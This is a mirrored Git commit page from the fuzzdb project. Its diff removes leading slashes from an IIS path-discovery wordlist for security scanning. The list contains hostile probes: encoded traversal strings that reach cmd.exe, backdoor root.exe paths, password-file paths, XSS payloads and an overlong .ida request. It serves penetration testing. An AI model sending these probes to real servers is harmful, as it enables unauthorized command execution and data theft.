Mirrors/fuzzdb
2
0
Fork 0
mirror of https://github.com/fuzzdb-project/fuzzdb.git synced 2024-11-10 05:24:12 +00:00
Code Issues Projects Releases Packages Wiki Activity

remove leading /

Browse source
This commit is contained in:
Adam Muntner 2016-05-18 12:49:47 -04:00
parent 4cb117f9fe
commit 9416c760ed
1 changed files with 186 additions and 186 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

372
discovery/predictable-filepaths/webservers-appservers/IIS.fuzz.txt
View file

@ -1,187 +1,187 @@
/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/a%5c.aspx
/AccessPlatform/
/AccessPlatform/auth/
/AccessPlatform/auth/clientscripts/
/AccessPlatform/auth/clientscripts/cookies.js
/AccessPlatform/auth/clientscripts/login.js
/admin/
/administration/
/administrator/
/Admin/knowledge/dsmgr/users/GroupManager.asp
/Admin/knowledge/dsmgr/users/UserManager.asp
/adovbs.inc
/adsamples/
/AdvWorks/equipment/catalog_type.asp
/ajfhasdfgsagfakjhgd
/archi~1/
/Archi~1/
/aspnet_files/
/asp/
/asps/
/ASPSamp/AdvWorks/equipment/catalog_type.asp
/_AuthChangeUrl?
/bin/
/bins/
/certcontrol/
/certenroll/
/certsrv/
/cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/CFIDE/Administrator/startstop.html
/cgi
/cgi-bin/a1stats/a1disp.cgi
/cgi-bin/htimage.exe?2,2
/cgi-bin/htmlscript
/cgi-bin/imagemap.exe?2,2
/checkapache.html
/citrix/
/citrix/AccessPlatform/auth/
/citrix/AccessPlatform/auth/clientscripts/
/Citrix//AccessPlatform/auth/clientscripts/cookies.js
/Citrix/AccessPlatform/auth/clientscripts/login.js
/Citrix/PNAgent/config.xml
/clocktower
/cmsample/
/db/
/domcfg.nsf/?open
/Exadmin/
/Exchange/
/exchange/root.asp
/ExchWeb/
/forum_arc.asp
/forum.asp
/forum_professionnel.asp
/help/
/iiasdmpwd/
/iisadmin/
/iisadmpwd/achg.htr
/iisadmpwd/aexp2b.htr
/iisadmpwd/aexp2.htr
/iisadmpwd/aexp3.htr
/iisadmpwd/aexp4b.htr
/iisadmpwd/aexp4.htr
/iisadmpwd/aexp.htr
/iisadmpwd/anot3.htr
/iisadmpwd/anot.htr
/iishelp/
/iishelp/iis/misc/default.asp
/iissamples/
/iissamples/exair/howitworks/Code.asp
/iissamples/exair/howitworks/Codebrw1.asp
/iissamples/exair/howitworks/Codebrws.asp
/iissamples/sdk/asp/docs/codebrw2.asp
/iissamples/sdk/asp/docs/codebrws.asp
/iissamples/sdk/asp/docs/CodeBrws.asp
/imprimer.asp
/includes/adovbs.inc
/index.php
/index.shtml
/isapi/
/_layouts/alllibs.htm
/_layouts/settings.htm
/_layouts/userinfo.htm
..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
a%5c.aspx
AccessPlatform/
AccessPlatform/auth/
AccessPlatform/auth/clientscripts/
AccessPlatform/auth/clientscripts/cookies.js
AccessPlatform/auth/clientscripts/login.js
admin/
administration/
administrator/
Admin/knowledge/dsmgr/users/GroupManager.asp
Admin/knowledge/dsmgr/users/UserManager.asp
adovbs.inc
adsamples/
AdvWorks/equipment/catalog_type.asp
ajfhasdfgsagfakjhgd
archi~1/
Archi~1/
aspnet_files/
asp/
asps/
ASPSamp/AdvWorks/equipment/catalog_type.asp
_AuthChangeUrl?
bin/
bins/
certcontrol/
certenroll/
certsrv/
cfide/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
CFIDE/Administrator/startstop.html
cgi
cgi-bin/a1stats/a1disp.cgi
cgi-bin/htimage.exe?2,2
cgi-bin/htmlscript
cgi-bin/imagemap.exe?2,2
checkapache.html
citrix/
citrix/AccessPlatform/auth/
citrix/AccessPlatform/auth/clientscripts/
Citrix//AccessPlatform/auth/clientscripts/cookies.js
Citrix/AccessPlatform/auth/clientscripts/login.js
Citrix/PNAgent/config.xml
clocktower
cmsample/
db/
domcfg.nsf/?open
Exadmin/
Exchange/
exchange/root.asp
ExchWeb/
forum_arc.asp
forum.asp
forum_professionnel.asp
help/
iiasdmpwd/
iisadmin/
iisadmpwd/achg.htr
iisadmpwd/aexp2b.htr
iisadmpwd/aexp2.htr
iisadmpwd/aexp3.htr
iisadmpwd/aexp4b.htr
iisadmpwd/aexp4.htr
iisadmpwd/aexp.htr
iisadmpwd/anot3.htr
iisadmpwd/anot.htr
iishelp/
iishelp/iis/misc/default.asp
iissamples/
iissamples/exair/howitworks/Code.asp
iissamples/exair/howitworks/Codebrw1.asp
iissamples/exair/howitworks/Codebrws.asp
iissamples/sdk/asp/docs/codebrw2.asp
iissamples/sdk/asp/docs/codebrws.asp
iissamples/sdk/asp/docs/CodeBrws.asp
imprimer.asp
includes/adovbs.inc
index.php
index.shtml
isapi/
_layouts/alllibs.htm
_layouts/settings.htm
_layouts/userinfo.htm
# Look at the result codes in the headers - 403 likely mean the dir exists, 404 means not. It takes an ISAPI filter for IIS to return 404's for 403s.
/Mail/smtp/Admin/smadv.asp
/market
/_mem_bin/
/_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_mem_bin/autoconfig.asp
/_mem_bin/formslogin.asp
/Micros~1/
/Microsoft-Server-ActiveSync/
/msadc/
/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/Samples/selector/showcode.asp
/msdac/root.exe?/c+dir
/mspress30
/%NETHOOD%/
/null.htw
/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
/OMA/
/OWA/
/pbserver/pbserver.dll
/postinfo.html
/.printer
/_private
/progra~1
/Progra~1
/Public/
/publisher
/qwertypoiu.htw
/qwertypoiu.printer
/rubrique.asp
/samples/
/~/<script>alert('XSS')</script>.asp
/~/<script>alert('XSS')</script>.aspx
/<script>alert('XSS')</script>.aspx
/scripts/
/scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
/scripts/cgimail.exe
/scripts/convert.bas
/scripts/counter.exe
/scripts/fpcount.exe
/scripts/iisadmin/ism.dll?http/dir
/scripts/no-such-file.pl
/scripts/root.exe?/c+dir
/scripts/samples/search/webhits.exe
/scripts/tools/getdrvs.exe
/scripts/tools/newdsn.exe
/search?NS-query-pat=..\..\..\..\..\boot.ini
/share/
/SiteServer/Admin
/SiteServer/Admin/commerce/foundation/driver.asp
/SiteServer/Admin/commerce/foundation/DSN.asp
/SiteServer/admin/findvserver.asp
/SiteServer/Admin/knowledge/dsmgr/default.asp
/siteserver/publishing/viewcode.asp
/SiteServer/Publishing/viewcode.asp
/Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
/Sites/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
/Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
/Sites/Samples/Knowledge/Push/ViewCode.asp
/Sites/Samples/Knowledge/Search/ViewCode.asp
/test/
/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
/tsweb/
/vc30
/_fpclass/
/_vti_adm/
/_vti_aut/
/_vti_bin/
/_vti_bin/
/_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/fpcount.exe?Page=default.asp|Image=3
/_vti_bin/shtml.dll
/_vti_bin/shtml.dll/asdfghjkl
/_vti_bin/shtml.exe/qwertyuiop
/_vti_bin/_vti_aut/dvwssr.dll
/_vti_bin/_vti_aut/fp30reg.dll
/_vti_bin/_vti_aut/fp30reg.dll?1234=X
/_vti_cnf/
/_vti_log/
/_vti_pvt/
/_vti_pvt/
/_vti_pvt/administrator.pwd
/_vti_pvt/administrators.pwd
/_vti_pvt/authors.pwd
/_vti_pvt/service.pwd
/_vti_pvt/shtml.exe
/_vti_pvt/users.pwd
/_vti_script
/_vti_txt
/_WEB_INF/
/Web.config
/WEB-INF/web.xml
/WebSer~1
/x.cfm
/x.htw
/x.htx
/x.ida
/x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
/x.idc
/x.idq
/x.pl
/x.shtml
Mail/smtp/Admin/smadv.asp
market
_mem_bin/
_mem_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_mem_bin/autoconfig.asp
_mem_bin/formslogin.asp
Micros~1/
Microsoft-Server-ActiveSync/
msadc/
msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
msadc/Samples/selector/showcode.asp
msdac/root.exe?/c+dir
mspress30
%NETHOOD%/
null.htw
null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHilite
OMA/
OWA/
pbserver/pbserver.dll
postinfo.html
.printer
_private
progra~1
Progra~1
Public/
publisher
qwertypoiu.htw
qwertypoiu.printer
rubrique.asp
samples/
~/<script>alert('XSS')</script>.asp
~/<script>alert('XSS')</script>.aspx
<script>alert('XSS')</script>.aspx
scripts/
scripts/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
scripts/..%c0%af..%c0%afwinnt/system32/cmd.exe?/c+dir+c:\\
scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\\
scripts/cgimail.exe
scripts/convert.bas
scripts/counter.exe
scripts/fpcount.exe
scripts/iisadmin/ism.dll?http/dir
scripts/no-such-file.pl
scripts/root.exe?/c+dir
scripts/samples/search/webhits.exe
scripts/tools/getdrvs.exe
scripts/tools/newdsn.exe
search?NS-query-pat=..\..\..\..\..\boot.ini
share/
SiteServer/Admin
SiteServer/Admin/commerce/foundation/driver.asp
SiteServer/Admin/commerce/foundation/DSN.asp
SiteServer/admin/findvserver.asp
SiteServer/Admin/knowledge/dsmgr/default.asp
siteserver/publishing/viewcode.asp
SiteServer/Publishing/viewcode.asp
Sites/Knowledge/Membership/Inspiredtutorial/Viewcode.asp
Sites/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp
Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp
Sites/Samples/Knowledge/Push/ViewCode.asp
Sites/Samples/Knowledge/Search/ViewCode.asp
test/
tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=goatfart+samples+from+microsoft&dbq=..%2F..%2Fwwwroot%2goatfart.html&newdb=CREA
tsweb/
vc30
_fpclass/
_vti_adm/
_vti_aut/
_vti_bin/
_vti_bin/
_vti_bin/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
_vti_bin/fpcount.exe?Page=default.asp|Image=3
_vti_bin/shtml.dll
_vti_bin/shtml.dll/asdfghjkl
_vti_bin/shtml.exe/qwertyuiop
_vti_bin/_vti_aut/dvwssr.dll
_vti_bin/_vti_aut/fp30reg.dll
_vti_bin/_vti_aut/fp30reg.dll?1234=X
_vti_cnf/
_vti_log/
_vti_pvt/
_vti_pvt/
_vti_pvt/administrator.pwd
_vti_pvt/administrators.pwd
_vti_pvt/authors.pwd
_vti_pvt/service.pwd
_vti_pvt/shtml.exe
_vti_pvt/users.pwd
_vti_script
_vti_txt
_WEB_INF/
Web.config
WEB-INF/web.xml
WebSer~1
x.cfm
x.htw
x.htx
x.ida
x.ida?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=X
x.idc
x.idq
x.pl
x.shtml